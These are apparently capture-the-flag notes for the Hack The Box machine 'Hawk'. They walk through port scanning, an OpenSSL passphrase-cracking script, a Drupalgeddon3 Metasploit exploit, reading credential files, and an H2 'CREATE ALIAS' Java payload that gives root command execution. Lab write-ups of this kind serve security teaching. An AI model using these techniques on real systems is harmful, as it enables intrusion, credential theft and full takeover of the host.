[HTB Notes] Hawk

1. Check open ports
nmap --min-rate 1000 -p- -v 10.10.10.102
# 21/tcp   open  ftp
# 22/tcp   open  ssh
# 80/tcp   open  http
# 5435/tcp open  sceanics
# 8082/tcp open  blackice-alerts
nmap -oN hawk -p21,22,80,5435,8082 -sC -sV -v 10.10.10.102
# 21/tcp   open  ftp           vsftpd 3.0.3
# | ftp-anon: Anonymous FTP login allowed (FTP code 230)
# |_drwxr-xr-x    2 ftp      ftp          4096 Jun 16 22:21 messages
# | ftp-syst: 
# |   STAT: 
# | FTP server status:
# |      Connected to ::ffff:10.10.12.250
# |      Logged in as ftp
# |      TYPE: ASCII
# |      No session bandwidth limit
# |      Session timeout in seconds is 300
# |      Control connection is plain text
# |      Data connections will be plain text
# |      At session startup, client count was 2
# |      vsFTPd 3.0.3 - secure, fast, stable
# |_End of status
# 22/tcp   open  ssh           OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
# | ssh-hostkey: 
# |   2048 e4:0c:cb:c5:a5:91:78:ea:54:96:af:4d:03:e4:fc:88 (RSA)
# |   256 95:cb:f8:c7:35:5e:af:a9:44:8b:17:59:4d:db:5a:df (ECDSA)
# |_  256 4a:0b:2e:f7:1d:99:bc:c7:d3:0b:91:53:b9:3b:e2:79 (ED25519)
# 80/tcp   open  http          Apache httpd 2.4.29 ((Ubuntu))
# | http-methods: 
# |_  Supported Methods: GET HEAD POST OPTIONS
# | http-robots.txt: 36 disallowed entries (15 shown)
# | /includes/ /misc/ /modules/ /profiles/ /scripts/ 
# | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
# | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
# |_/LICENSE.txt /MAINTAINERS.txt
# |_http-server-header: Apache/2.4.29 (Ubuntu)
# |_http-title: Site doesn't have a title (text/html; charset=UTF-8).
# 5435/tcp open  tcpwrapped
# 8082/tcp open  http          H2 database http console
# |_http-favicon: Unknown favicon MD5: 8EAA69F8468C7E0D3DFEF67D5944FF4D
# | http-methods: 
# |_  Supported Methods: GET POST
# |_http-title: H2 Console

2. Begin enumeration of the available ports
[x] Explore ftp service at port 21
ftp 10.10.10.102
# Name (10.10.10.102:root): anonymous
# ftp>
ls -la
# drwxr-xr-x    2 ftp      ftp          4096 Jun 16 22:21 messages
cd messages
ls -la
# -rw-r--r--    1 ftp      ftp           240 Jun 16 22:21 .drupal.txt.enc
get .drupal.txt.enc
# local: .drupal.txt.enc remote: .drupal.txt.enc
# 240 bytes received in 0.00 secs
exit
[x] Check the contents of .drupal.txt.enc
cat .drupal.txt.enc
# U2FsdGVkX19rWSAG1JNpLTawAmzz/ckaN1oZFZewtIM+e84km3Csja3GADUg2jJb
# CmSdwTtr/IIShvTbUd0yQxfe9OuoMxxfNIUN/YPHx+vVw/6eOD+Cc1ftaiNUEiQz
# QUf9FyxmCb2fuFoOXGphAMo+Pkc2ChXgLsj4RfgX+P7DkFa8w1ZA9Yj7kR+tyZfy
# t4M0qvmWvMhAj3fuuKCCeFoXpYBOacGvUHRGywb4YCk=
base64 --decode .drupal.txt.enc
# Salted__kY ...
base64 --decode .drupal.txt.enc > openssl_salted
#
[x] Create script (salty.sh) to decrypt openssl_salted using a wordlist
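#!/bin/bash
# salty.sh - try each line of a wordlist as the passphrase for an OpenSSL
# "Salted__" blob and print the first one that decrypts it.
#
# Usage: salty.sh WORDLIST CIPHERTEXT_FILE
#   $1 - wordlist, one candidate passphrase per line
#   $2 - file produced by `openssl aes-256-cbc` (after base64 decoding)
# Outputs: "key: <passphrase>" followed by the plaintext, on stdout
# Returns: 0 when a passphrase decrypted the file, 1 when the list is
#          exhausted, 2 on a usage error

if [[ $# -ne 2 ]]; then
  printf 'Usage: %s WORDLIST CIPHERTEXT_FILE\n' "${0##*/}" >&2
  exit 2
fi

wordlist=$1
cipher_file=$2

# -r keeps backslashes in the candidate literal and IFS= keeps its leading or
# trailing whitespace; the `|| [[ -n ... ]]` form still processes a final line
# that has no trailing newline.
while IFS= read -r candidate || [[ -n "$candidate" ]]; do
  # The passphrase is handed over through the environment instead of -k on
  # argv, so it is not visible in `ps` output while openssl runs.
  # Success is judged by openssl's exit status rather than by grepping stderr
  # for "bad decrypt": the message wording varies between releases, the
  # status does not.
  # NOTE: the default KDF digest for `enc` changed between OpenSSL releases
  # (md5 before 1.1.0, sha256 from 1.1.0); if a known-good passphrase fails,
  # pass the -md option that matches the encrypting side.
  if plaintext=$(SALTY_PASS="$candidate" openssl aes-256-cbc -d \
        -pass env:SALTY_PASS -in "$cipher_file" 2>/dev/null); then
    printf 'key: %s\n' "$candidate"
    # Quoted printf keeps the plaintext's internal whitespace intact, which
    # an unquoted `echo $(...)` would collapse.
    printf '%s\n' "$plaintext"
    exit 0
  fi
done < "$wordlist"

printf 'no passphrase in %s decrypted %s\n' "$wordlist" "$cipher_file" >&2
exit 1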
[x] Run salty.sh
./salty.sh /usr/share/wordlists/rockyou.txt openssl_salted
# key: friends
# Daniel, Following the password for the portal: PencilKeyboardScanner123 Please let us know when the portal is ready. Kind Regards, IT department
[x] Explore http service at port 80
[x] Login to the service
[x] USERNAME: admin
[x] PASSWORD: PencilKeyboardScanner123
[x] Title: Something
[x] Body: Something
[x] Check the version of the running service
[x] Drupal 7.58
[x] Search for available exploits
searchsploit drupal 7.58
# Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit)
# exploits/php/webapps/44557.rb
[x] Run msfconsole
msfconsole
# msf >
search drupal
# exploit/unix/webapp/drupalgeddon3
# Description: Drupalgeddon3
use exploit/unix/webapp/drupalgeddon3
# msf exploit(unix/webapp/drupalgeddon3) >
set DRUPAL_NODE { x | http://10.10.10.102/node/x }
set DRUPAL_SESSION SESSf81a199613881208c11cbfee1f525315=<AUTHENTICATED_SESSION_COOKIE>
set RHOST 10.10.10.102
set LHOST <HTB_IPv4>
exploit
shell
[x] While inside shell:
/bin/bash -i
# www-data@hawk:/var/www/html$
cat /etc/passwd
# root:x:0:0:root:/root:/bin/bash
# daniel:x:1002:1005::/home/daniel:/usr/bin/python3
find /var/www/html -name *settings* -exec ls -la {} \; 2>/dev/null
# -r--r--r-- 1 www-data www-data 26556 Jun 11 16:09 /var/www/html/sites/default/settings.php
# -rwxr-x--- 1 www-data www-data 26250 Jun 11 16:08 /var/www/html/sites/default/default.settings.php
cat /var/www/html/sites/default/settings.php
# 'database' => 'drupal',
# 'username' => 'drupal',
# 'password' => 'drupal4hawk',
# 'driver' => 'mysql',

3. Generate user shell (daniel)
[x] Login via SSH
ssh -l daniel 10.10.10.102
# daniel@10.10.10.102's password: drupal4hawk
[x] While inside the Python shell (daniel's login shell is /usr/bin/python3, per /etc/passwd)
from os import system as sh
sh("find / -name user.txt 2> /dev/null")
# /home/daniel/user.txt
sh("cat /home/daniel/user.txt")
# d5111d4f75370ebd01cdba5b32e202a8
exit()
# Connection to 10.10.10.102 closed.

4. Attempt Privilege Escalation (daniel -> root)
[x] H2 Console
[x] Sorry, remote connections ('webAllowOthers') are disabled on this server.
[x] Login via SSH with port forwarding
ssh -L 4444:localhost:8082 -l daniel 10.10.10.102
# daniel@10.10.10.102's password: drupal4hawk
[x] JDBC URL: jdbc:h2:tcp://localhost/~/drupal
[*] Leave the credentials as they are
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {

     java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A"); 

     return s.hasNext() ? s.next() : "";

}$$;
[x] Abuse code execution
CALL SHELLEXEC('id')
# uid=0(root) gid=0(root) groups=0(root)
CALL SHELLEXEC('find / -name root.txt')
# /root/root.txt
CALL SHELLEXEC('cat /root/root.txt')
# 54f3e840fe5564b42a8320fd2b608ba0